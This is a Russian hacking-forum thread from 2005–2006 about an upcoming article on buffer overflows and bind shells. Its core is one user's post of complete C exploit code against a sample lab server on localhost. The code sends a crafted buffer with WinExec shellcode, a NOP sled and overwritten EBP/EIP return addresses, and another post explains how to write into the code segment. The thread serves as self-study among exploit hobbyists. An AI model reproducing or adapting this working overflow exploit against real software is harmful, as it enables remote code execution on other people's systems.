Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

28.06.2005, 13:20
|
|
Новичок
Регистрация: 18.04.2005
Сообщений: 5
Провел на форуме: 9154
Репутация:
0
|
|
ждемммм..................
|
|
|

03.07.2005, 01:28
|
|
Новичок
Регистрация: 13.12.2004
Сообщений: 19
Провел на форуме: 31812
Репутация:
11
|
|
after 40 years ..
KEZ'ovi4.. ну, чёё...... старики.... я вот вспомнил что должен был выложить статью и мувик, но я забыыыыл.. тьяп..тьяп..тьяп.. ..... .. эээ... а по что я? что я только что говорил?.. ай ладно пойду передачю Фортачки посматрю.. Старуха ниси жрать! Тут кино наченается!! ОК мой дорогой.. уже бигу.. (посккрипивая костями..)
|
|
|

04.07.2005, 22:56
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме: 1941233
Репутация:
2726
|
|
Статья доделана. Дня через три повесим. (Пока будет ещё статья Задохлика).
конечно будет биндшелл и расказ (от меня, чаос пропал) как его сделать
|
|
|

09.10.2005, 04:30
|
|
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме: 249275
Репутация:
22
|
|
Хм, жаль я немного при*****л  Давненька не был в ваших краях, аднака... Вощем КЕЗ те грили ужо ниаднакратна чо крива пишиш. Павтаряца нибуду  Аднака мне видица чо и думаишь ты тожа крива (ну или нестандартна, если панимать пад этим чо ты ездешь из масквы в питер чериз камсамольск на амуре). Карочи я тут падумал малеха и решил забацать типа два-в-одном
Код:
//Типа-развивалочка для маленьких: найди дохуя отличий от "Client.cpp" в архиве "overflow.zip" :)
//Впадлу было коментить, ели еть вапросы пачему чота тама сделана так а ни еначе - задывайти,
//могет быть отвечу:) Пару-тройку падсказок аднака расставил:) Сатреть очинь унимательна:)
#include <winsock2.h>
#include <conio.h>
#pragma comment (lib, "ws2_32.lib")
//смиииирна! равнение на параграф! :)
char expl_data[109]="\x8B\x44\x24\xFC\x6A\x05\x83\xC0\x0C\x50\xFF\xD5\x63\x6D\x64\x20";
//зачении в сигменти данных и так перивернуты->пишим пряма! нахуя было марочица?
int ebp=0x77E6FD35; //А это kernel32.WinExec
int eip=0x00401090; //кхе кхе
#define explsiz sizeof(expl_data)
char expl_size = explsiz;
bool waitfl;
#define progname "overflow_exploit"
//падаждем паддаждем а то нивидна нихера
int cexit(int reason, char* msg){
cprintf(msg);
if (waitfl) {
cprintf("Press any key to exit.\n");
getch();
}
return reason;
}
int main( int argc, char* argv[] ){
WSADATA wsaData;
SOCKET client_socket;
sockaddr_in server_addr;
if(strcmp(argv[0],progname)) waitfl=true; else waitfl=false;
cprintf( "Server.exe TEST EXPLOIT.\nBy [YOU_NICK].\nThis exploit can overflow server cmd_data buffer and execute function fl().\n\n" );
cprintf( "+Starting Winsock...\n" );
if (WSAStartup(0x0202, &wsaData )) return cexit(1,"+Error initialise sockets API...\n");
cprintf( "+Creating client socket...\n" );
client_socket = socket( AF_INET, SOCK_STREAM, 0 );
if (client_socket == INVALID_SOCKET) return cexit(2,"+Error while create socket...\n");
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons( 8877 );
server_addr.sin_addr.s_addr = inet_addr( "127.0.0.1" );
cprintf( "+Connecting to 127.0.0.1 on port 8877...\n" );
if (SOCKET_ERROR == connect(client_socket, (LPSOCKADDR)&server_addr, sizeof( server_addr )))
return cexit(3,"+Error while connection...\n");
cprintf( "+Sending exploit codes %d bytes\n", explsiz);
memset(&expl_data[16], 0x90, explsiz-9-16);//NOP После отработки fl() упрвление передается на этот код
memcpy(&expl_data[explsiz-9],&ebp,4);
memcpy(&expl_data[explsiz-9+4],&eip,4);
expl_data[explsiz]=0;
send( client_socket, &expl_size, 1, 0 );
send( client_socket, expl_data, explsiz, 0 );
shutdown(client_socket, 2);
closesocket(client_socket);
WSACleanup();
return cexit(0, "OK\n");
}
Сообщение от cha0s
интересно... если функция тест в секции .text которая READABLE | EXECUTABLE
как же ты что-то в ней меняешь...
разве что в исходнике, но это не интересно
Да, бля, песец как интересна  Но увы не мне. Тебе же придеца доучить пратектид моду. К сегменту кода мона обращацы чериз селектор сегмента даных патамушты ни мелкасофт ни багленд нихера не хатят прислушиваца к рекаминдациям интел и даже силектар стека указываит на тот же физ адрес. Канкретнее: ss==ds!=cs, но физ адрес и ds cs адин и тот жи, в чом моно убидица пасатрев ЛДТ. Пасему если хошь пиризаписать cs:XXXXXXXX то эта делаица легко, напр. так: mov ds:[XXXXXXXX], 12345678h
P.S. Ничо чта так падробна? Эта у миня проста планавае мераприятие па барьбе с ламерствам  Даешь песать статьи граматна андака! А у каго у вас ищо есть план? Тады мы идем к вам! 
|
|
|

09.10.2005, 04:36
|
|
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме: 249275
Репутация:
22
|
|
Гмы, у первам предлажении я вощем папытался выразить мыслю чо сажалею в связи с тим чо нимного припизднился/пропизднился/апаздал кароче ...
|
|
|

19.03.2006, 09:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
а че такое? скачал ваш архив, начал распаковывать. Выдает ошибку в Crc
|
|
|
|

19.03.2006, 10:47
|
|
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме: 2333839
Репутация:
212
|
|
мдя...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|